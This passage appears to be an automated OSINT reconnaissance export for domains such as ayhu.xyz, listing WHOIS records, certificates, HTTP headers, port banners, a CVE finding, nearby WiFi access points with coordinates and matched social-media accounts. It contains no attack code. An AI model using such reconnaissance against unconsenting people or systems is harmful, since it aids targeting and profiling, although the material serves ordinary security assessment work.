10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003916]\n "CabF331.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression | 185.199.109.153 |
| 2023-05-12 03:11:22 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 207.154.228.169 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, 29405, United States, North America |
| 2023-05-12 03:12:12 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 188.114.96.1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Villakakelbond2 (Net ID: 00:14:5C:8C:72:80) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.169): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:37 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | registrar-abuse@cloudflare.com | Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2023-03-07T02:18:07.0Z
Creation Date: 2022-03-31T20:18:56.0Z
Registry Expiry Date: 2024-03-31T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hamburg
Registrant Country: DE
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: PRANAB.NS.CLOUDFLARE.COM
Name Server: JOCELYN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:59:45.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: TAYHU.XYZ
Registry Domain ID: D286586654-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-09T21:53:06Z
Creation Date: 2022-03-31T20:18:56Z
Registrar Registration Expiration Date: 2024-03-31T23:59:59Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: Hamburg
Registrant Postal Code: DATA REDACTED
Registrant Country: DE
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/tayhu.xyz
Name Server: jocelyn.ns.cloudflare.com
Name Server: pranab.ns.cloudflare.com
DNSSEC: unsigned
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:45Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | REL (Net ID: 00:02:2D:02:35:63) | 37.7813933,-122.3918002 |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0101dd.github.io |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | totamay (Net ID: 00:02:2D:29:D3:71) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MPR1 (Net ID: 00:02:6F:BD:4E:18) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:45:53 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3037::6815:470e |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:17:4A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Instagram (Category: social)
https://instagram.com/ayhu | ayhu |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2091
Connection: close
WWW-Authenticate: Basic realm="Restricted Area"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
| 87.248.157.102 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Companies based in Bath, Somerset | baffin.netcraft.com |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.165): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/patrickpogoda | patrickpogoda |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpanel.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
26:b6:b9:a7:2f:e5:4c:52:ac:47:f6:61:c0:02:b0:ef:8e:c3:
a6:d3:f1:ec:92:c0:a2:e1:7b:19:b2:3a:4e:87:84:15:a6:4c:
8a:85:bd:36:13:13:c4:da:73:35:49:ef:cb:b3:e1:6a:f3:e3:
6a:cd:e3:23:e6:23:db:2a:e9:31:93:fb:15:36:e7:dc:5c:fa:
c4:54:cb:5a:6a:98:38:29:87:fa:da:f5:13:2c:eb:21:a6:ca:
f5:a7:ff:b2:8b:c4:dc:75:27:1e:79:9e:da:a2:ef:91:70:58:
b0:db:99:37:98:c0:d2:e2:54:58:cd:4b:38:9f:64:cd:b8:28:
b3:53:a2:f7:25:f8:e5:6e:f5:cc:14:4f:d5:0c:26:d1:5d:4e:
26:51:28:7f:b6:23:ed:bf:75:93:69:22:6c:68:43:cc:6d:a2:
d1:16:79:71:e0:05:8c:5a:b0:10:74:43:19:6e:9b:04:0e:8c:
40:57:7c:d4:5f:a9:81:06:c7:26:a0:f5:3e:b1:df:d4:c4:1a:
2d:cd:6c:a6:e8:75:2e:d8:c6:69:39:72:bd:2b:3f:43:f8:67:
8b:9a:da:b6:90:6f:99:25:70:bc:1f:f3:ed:e2:ac:a1:e9:99:
1f:bc:90:9b:26:e4:c0:04:b6:b2:ea:2c:58:3b:a1:0e:f3:0c:
4e:9f:6c:9d
|
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c53def4fc411045-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 115.48.229.35.bc.googleusercontent.com | 35.229.48.115 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:31:8E:D4) | 39.0469, -77.4903 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4F32 (Net ID: 00:1D:D4:64:4F:30) | 32.8608, -79.9746 |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz. 300 IN CNAME battleb0t.github.io. | www.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | imgur (Category: images)
https://imgur.com/user/login/about | login |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@ascio.com | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Ashton7346 (Net ID: 00:06:25:61:05:DC) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101.github.io]
https://www.openphish.com/feed.txt | 0101.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | snoopyine (Net ID: 00:01:E3:4A:B1:79) | 50.1188, 8.6843 |
